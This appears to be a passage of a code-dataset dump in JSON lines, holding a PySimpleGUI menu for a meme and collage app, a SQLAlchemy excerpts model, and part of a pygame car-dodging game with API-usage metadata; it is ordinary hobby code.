"utils.KEY.TYPE", "line_number": 437, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 437, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 438, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 438, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 440, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 440, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 454, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 454, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 454, "usage_type": "attribute"}, {"api_name": "utils.KEY.OPERATION", "line_number": 456, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 456, "usage_type": "name"}, {"api_name": "utils.KEY.OPERATION", "line_number": 458, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 458, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 463, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 463, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 463, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 463, "usage_type": "name"}, {"api_name": "utils.KEY.OPERATION", "line_number": 470, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 470, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 471, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 473, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.KEY.OPERATION", "line_number": 473, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 475, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 475, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 494, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 494, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 494, "usage_type": "attribute"}, {"api_name": "utils.KEY.CONTENT", "line_number": 496, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 496, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 500, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 500, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 500, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY.CONTENT", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 515, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 515, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 519, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 519, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 519, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 519, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 531, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 531, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 537, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 537, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 537, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 537, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 540, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 540, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 561, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 561, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 566, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 566, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 566, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 566, "usage_type": "name"}, {"api_name": "utils.KEY.COMMENT_ID", "line_number": 569, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 569, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 570, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 570, "usage_type": "name"}, {"api_name": "utils.KEY.AUTHOR_ID", "line_number": 571, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 571, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 572, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 572, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 573, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 573, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 575, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 575, "usage_type": "name"}, {"api_name": "utils.KEY.AUTHOR_ID", "line_number": 575, "usage_type": "attribute"}, {"api_name": "utils.KEY.AUTHOR", "line_number": 578, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 578, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 578, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 596, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 596, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 596, "usage_type": "attribute"}, {"api_name": "utils.KEY.TYPE", "line_number": 596, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 600, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 600, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 600, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY.TYPE", "line_number": 600, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 616, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 616, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 616, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 620, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 620, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 620, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 620, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 620, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 639, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 639, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 641, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 641, "usage_type": "name"}, {"api_name": "ast.literal_eval", "line_number": 644, "usage_type": "call"}, {"api_name": "utils.KEY.VALUE", "line_number": 644, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 644, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 655, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 655, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 655, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY.USER_ID", "line_number": 655, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 671, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 671, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 671, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 671, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 676, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 676, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 676, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 676, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 676, "usage_type": "attribute"}, {"api_name": "utils.KEY.VALUE", "line_number": 676, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 693, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 693, "usage_type": "name"}, {"api_name": "utils.KEY.HEALTH_ID", "line_number": 696, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 696, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 697, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 697, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 698, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 698, "usage_type": "name"}, {"api_name": "utils.KEY.VALUE", "line_number": 699, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 699, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 700, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 700, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 714, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 714, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 719, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 719, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 719, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 719, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 741, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 741, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 741, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 746, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 746, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 746, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 746, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 746, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 763, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 763, "usage_type": "name"}, {"api_name": "utils.KEY.ILLNESS_ID", "line_number": 766, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 766, "usage_type": "name"}, {"api_name": "utils.KEY.USER_ID", "line_number": 767, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 767, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 768, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 768, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 769, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 769, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 783, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 783, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 789, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 789, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 789, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 789, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 809, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 809, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 813, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 813, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 813, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 813, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 826, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 826, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 832, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 832, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 832, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 832, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 851, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 851, "usage_type": "name"}]} +{"seq_id": "5330771592", "text": "import PySimpleGUI as sg\nimport ventanas.configuracion as confg\nimport os\nimport ventanas.GeneradorImagen as img\nimport ventanas.interfaz_meme as meme\nimport ventanas.ActualizarPerfil as act\nfrom PIL import Image, ImageDraw, ImageOps\nimport io\nimport os\nimport json\nimport ventanas.Ayuda as ayuda\nimport ventanas.EtiquetarImagenes as etiquetar\n\ndef MostrarImagen(ruta_imagen):\n imagen=Image.open(ruta_imagen)\n \n #Recorto la imagen de forma circular y la adapto a las medidas que yo busco \n \n ancho=50\n alto=50\n imagen = imagen.resize((ancho, alto))\n mascara = Image.new('L', (ancho, alto), 0)\n dibujo = ImageDraw.Draw(mascara)\n dibujo.ellipse((0, 0, ancho, alto), fill=350)\n imagen = ImageOps.fit(imagen, mascara.size, centering=(0.5, 0.5))\n imagen.putalpha(mascara)\n imagen = imagen.convert('RGBA')\n # Convertir la imagen en un búfer de bytes\n with io.BytesIO() as output:\n imagen.save(output, format='PNG')\n data = output.getvalue()\n return data\n\ndef crearVentana(datos,nickname):\n print(datos)\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_imagenes=os.path.abspath(os.path.join(directorio,\"..\",\"imagenes\"))\n directorio_perfil=os.path.abspath(os.path.join(directorio_imagenes,nickname[0]+\".png\"))\n #sg.set_options(font=(\"Cooper Black\",16))\n data=MostrarImagen(directorio_perfil)\n\n menu =[ [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Generador de Memes',key=\"-mem-\",size=(25,1))],\n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Generador de Collage',key=\"-collage-\",size=(25,1))],\n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Etiquetar Imágenes',key=\"-img-\",size=(25,1))], \n [sg.Image(background_color=\"tan\",size=(5,5))],\n [sg.Button('Salir',pad=(90,2))]\n ]\n barra_layout =[sg.Column(\n [\n [sg.Button(image_data=data, enable_events=True, image_subsample=2, border_width=0, button_color=\"Tan\", key=\"-actualizar-\")],\n [sg.Text(\" \"+nickname[0], font=(\"Black\",11), background_color=\"Tan\")]\n ],\n element_justification=\"left\",\n justification=\"left\",\n background_color=\"Tan\"\n ),sg.Push(\"Tan\"),\n sg.Column(\n [[ \n sg.Button(image_filename=os.path.abspath(os.path.join(directorio_imagenes,\"configuracion.png\")),button_color=\"Tan\",key=\"config\",border_width=0), \n \n sg.Image(background_color=\"tan\",size=(5,5)),\n \n sg.Button(image_filename=os.path.abspath(os.path.join(directorio_imagenes,\"ayuda.png\")),button_color=\"Tan\", border_width=0,key='help'), \n ]])\n ]\n\n \n layout = [[\n barra_layout,\n sg.Column(menu,background_color=\"Tan\",)]\n ]\n \n window = sg.Window(\"Menú Principal\", layout,finalize=True,resizable=True,element_justification=\"Center\")\n window.set_min_size((500,500))\n window.BackgroundColor=(\"Tan\")\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_direcciones=os.path.abspath(os.path.join(directorio,\"direcciones.txt\"))\n try:\n lectura=open(directorio_direcciones,\"r\")\n except FileNotFoundError:\n escritura=open(directorio_direcciones,\"w\")\n escritura.write (directorio_imagenes+\"@\"+directorio_imagenes+\"@\"+directorio_imagenes)\n escritura.close()\n lectura=open(directorio_direcciones,\"r\")\n lista=lectura.readline()\n lista=lista.split(\"@\")\n for e in lista:\n dir_im=lista[0]\n dir_coll=lista[1]\n dir_mem=lista[2]\n lectura.close()\n \n while True:\n event, values = window.read()\n \n if event in (sg.WIN_CLOSED, 'Salir'):\n break\n elif event == ('help'):\n ayuda.crearVentana()\n elif event==\"-actualizar-\":\n dicc={}\n directorio=os.path.abspath(os.path.dirname(__file__))\n directorio_direcciones=os.path.abspath(os.path.join(directorio,\"..\",\"perfiles.json\"))\n archivo=open(directorio_direcciones,\"r\") \n dicc=json.load(archivo)\n archivo.close()\n lista=act.CrearVentana(datos,nickname)\n print(lista)\n datos=lista\n dicc[nickname[0]]=lista\n archivo= open(directorio_direcciones,\"w\")\n json.dump(dicc,archivo)\n archivo.close()\n window[\"-actualizar-\"].update(image_data=MostrarImagen(dicc[nickname[0]][3]))\n elif event == 'config':\n confg.CrearVentana()\n elif event == '-mem-':\n meme.crearVentana()\n elif event == \"-collage-\":\n img.crearVentana()\n elif event==\"-img-\":\n etiquetar.crearVentana(dir_im,nickname)\n window.close()\n \n", "repo_name": "Valenturco/python_proyecto", "sub_path": "grupo36-main-unlpimage/unlpimage/ventanas/Menu_Principal.py", "file_name": "Menu_Principal.py", "file_ext": "py", "file_size_in_byte": 4934, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 15, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 23, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 23, "usage_type": "name"}, {"api_name": "PIL.ImageOps.fit", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 25, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 42, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 43, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 44, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 45, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 46, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 47, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 48, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 49, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 51, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 53, "usage_type": "call"}, {"api_name": "PySimpleGUI.Text", "line_number": 54, "usage_type": "call"}, {"api_name": "PySimpleGUI.Push", "line_number": 59, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 60, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "PySimpleGUI.Image", "line_number": 64, "usage_type": "call"}, {"api_name": "PySimpleGUI.Button", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "PySimpleGUI.Column", "line_number": 73, "usage_type": "call"}, {"api_name": "PySimpleGUI.Window", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "PySimpleGUI.WIN_CLOSED", "line_number": 99, "usage_type": "attribute"}, {"api_name": "ventanas.Ayuda.crearVentana", "line_number": 102, "usage_type": "call"}, {"api_name": "ventanas.Ayuda", "line_number": 102, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "json.load", "line_number": 108, "usage_type": "call"}, {"api_name": "ventanas.ActualizarPerfil.CrearVentana", "line_number": 110, "usage_type": "call"}, {"api_name": "ventanas.ActualizarPerfil", "line_number": 110, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 115, "usage_type": "call"}, {"api_name": "ventanas.configuracion.CrearVentana", "line_number": 119, "usage_type": "call"}, {"api_name": "ventanas.configuracion", "line_number": 119, "usage_type": "name"}, {"api_name": "ventanas.interfaz_meme.crearVentana", "line_number": 121, "usage_type": "call"}, {"api_name": "ventanas.interfaz_meme", "line_number": 121, "usage_type": "name"}, {"api_name": "ventanas.GeneradorImagen.crearVentana", "line_number": 123, "usage_type": "call"}, {"api_name": "ventanas.GeneradorImagen", "line_number": 123, "usage_type": "name"}, {"api_name": "ventanas.EtiquetarImagenes.crearVentana", "line_number": 125, "usage_type": "call"}, {"api_name": "ventanas.EtiquetarImagenes", "line_number": 125, "usage_type": "name"}]} +{"seq_id": "3221566909", "text": "from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom sqlalchemy.types import PickleType\n\nBase = declarative_base()\n\nclass DBExcerpts(Base):\n __tablename__ = 'excerpts'\n\n excerpt_id = Column(String(100), \n primary_key=True,\n nullable=False, \n unique=True)\n excerpt_processed = Column(String(10005),\n nullable=False)\n city = Column(String(50), \n nullable=False)\n state = Column(String(2),\n nullable=False)\n excerpt_vector = Column(String(10),#PickleType\n nullable=False)\n source_date = Column(Date, \n nullable=False)\n\n# def __repr__(self):\n# return f\"Excerpt: {self.excerpt_processed} - Date: {self.source_date} - City: {self.state} - State: {self.city} - Vector: {self.excerpt_vector}\"\n\n", "repo_name": "MLRG-CEFET-RJ/qdrec", "sub_path": "api/querido_diario/db/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 5, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Date", "line_number": 22, "usage_type": "argument"}]} +{"seq_id": "14432026174", "text": "#Imports\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\nimport random, time\r\n\r\n#Initialzing the pygame\r\npygame.init()\r\n\r\n#Setting up FPS \r\nFPS = 60\r\nFramePerSec = pygame.time.Clock()\r\n\r\n#Creating colors\r\nBLUE = (0, 0, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\n\r\n#Other Variables for use in the program\r\nSCREEN_WIDTH = 400\r\nSCREEN_HEIGHT = 600\r\nSPEED = 5\r\nSCORE = 0\r\n\r\n#Setting up Fonts\r\nfont = pygame.font.SysFont(\"Verdana\", 60)\r\nfont_small = pygame.font.SysFont(\"Verdana\", 20)\r\ngame_over = font.render(\"Game Over\", True, BLACK)\r\n\r\nbackground = pygame.image.load(\"AnimatedStreet.png\") # loading a backgroud\r\n\r\n#Create a white screen \r\nDISPLAYSURF = pygame.display.set_mode((400,600))\r\nDISPLAYSURF.fill(WHITE)\r\npygame.display.set_caption(\"Game\")\r\n\r\n# Create a Coin class \r\nclass Coin(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__()\r\n self.image = pygame.Surface((50,50)) # create a surface\r\n self.image.fill((255,232,0)) # Fill to the yellow color \r\n self.rect = self.image.get_rect() # convert to self rect\r\n self.rect.y = 0\r\n self.rect.x = random.randint(10,SCREEN_WIDTH-50) #Generate random position for x value\r\n def move(self):\r\n self.rect.y += 5 # moving with speed 5\r\n # if we do not collide with player then again generate on the top \r\n if self.rect.y > SCREEN_HEIGHT:\r\n self.rect.y = 0\r\n self.rect.x = random.randint(10,SCREEN_WIDTH-10)\r\n\r\n# create an Enemy class\r\nclass Enemy(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__() \r\n self.image = pygame.image.load(\"Enemy.png\")\r\n self.rect = self.image.get_rect() # creating a rect object\r\n self.rect.center = (random.randint(40,SCREEN_WIDTH-40), 0) # creating a random position\r\n\r\n def move(self):\r\n global SCORE\r\n self.rect.move_ip(0,SPEED) # move_ip it is the rectangle function which help to change the position\r\n if (self.rect.bottom > 600):\r\n SCORE += 1 # if we do not collide with player , then + 1 point to the score \r\n self.rect.top = 0\r\n self.rect.center = (random.randint(40, SCREEN_WIDTH - 40), 0)\r\n\r\n# PLayer class\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__() \r\n self.image = pygame.image.load(\"Player.png\")\r\n self.rect = self.image.get_rect() # create a rect object \r\n self.rect.center = (160, 520) # set the center \r\n \r\n def move(self):\r\n pressed_keys = pygame.key.get_pressed()\r\n # moving PLayer object to the right or to the left \r\n if self.rect.left > 0:\r\n if pressed_keys[K_LEFT]:\r\n self.rect.move_ip(-5, 0)\r\n if self.rect.right < SCREEN_WIDTH: \r\n if pressed_keys[K_RIGHT]:\r\n self.rect.move_ip(5, 0)\r\n \r\n\r\n#Setting up Sprites \r\nP1 = Player()\r\nE1 = Enemy()\r\nC1 = Coin()\r\n\r\n#Creating Sprites Groups\r\npoints = pygame.sprite.Group()\r\nenemies = pygame.sprite.Group()\r\nenemies.add(E1)\r\npoints.add(C1)\r\nall_sprites = pygame.sprite.Group()\r\nall_sprites.add(P1)\r\nall_sprites.add(E1)\r\nall_sprites.add(C1)\r\n\r\n#Adding a new User event \r\nINC_SPEED = pygame.USEREVENT + 1\r\npygame.time.set_timer(INC_SPEED, 1000) # each time after 1 second will appear this event\r\n# creating a score to the points \r\ncnt = 0 \r\n#Game Loop\r\npygame.mixer.music.load('background.wav')\r\npygame.mixer.music.play(0)\r\nwhile True:\r\n \r\n #Cycles through all events occuring \r\n for event in pygame.event.get():\r\n # OUR-EVENT \r\n if event.type == INC_SPEED:\r\n SPEED += 0.5 \r\n # SIMPLE-EVENT \r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n\r\n # blitting our background to the surface \r\n DISPLAYSURF.blit(background, (0,0))\r\n #creating surfaces\r\n scores = font_small.render(str(SCORE), True, BLACK)\r\n earnpoints = font_small.render(str(cnt),True,BLACK)\r\n # bliting the surfaces\r\n DISPLAYSURF.blit(scores, (10,10))\r\n DISPLAYSURF.blit(earnpoints,(300,10))\r\n #Moves and Re-draws all Sprites\r\n for entity in all_sprites:\r\n entity.move()\r\n DISPLAYSURF.blit(entity.image, entity.rect)\r\n \r\n \r\n\r\n #To be run if collision occurs between Player and COIN\r\n if pygame.sprite.spritecollide(P1,points,True):\r\n cnt += 1 # increase the count \r\n print(cnt)\r\n C1 = Coin() # verating a new sprite Coin \r\n # adding our Sprite to the Group \r\n 